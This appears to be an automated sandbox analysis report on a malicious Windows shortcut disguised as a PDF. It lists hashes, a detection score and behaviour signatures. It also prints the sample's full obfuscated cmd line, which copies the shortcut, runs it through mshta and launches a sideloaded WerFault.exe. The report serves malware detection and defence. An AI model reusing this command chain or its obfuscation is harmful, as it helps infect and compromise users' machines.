Windows
Analysis Report
p3a3TSUccX.lnk
Overview
General Information
Field | Value |
---|---|
Sample name | p3a3TSUccX.lnk (renamed because the original name is a hash value) |
Original sample name | 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60.lnk |
Analysis ID | 1500949 |
MD5 | 54f4610b378845315fb6dbae629cd97c |
SHA1 | 59e38278a7f81438fe075789706a2b7e0b49184f |
SHA256 | 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60 |
Tags | lnk |
Detection
MalLnk
Field | Value |
---|---|
Score | 84 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
AI detected suspicious sample
Obfuscated command line found
Sigma detected: Suspicious Parent Double Extension File Execution
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 6464, cmdline: "C:\windows\System32\cmd.exe" $r$u$n$d$l $l$3$2 $S$he $ll$3$2$.d ll $$S$h$e $l$l$E$x$e $c_R$un$D$ L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))), MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6856, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - forfiles.exe (PID: 6228, cmdline: forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"", MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security | |
System Summary
Source | Author |
---|---|
| frack113, Nasreddine Bencherchali (Nextron Systems) |
| Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) |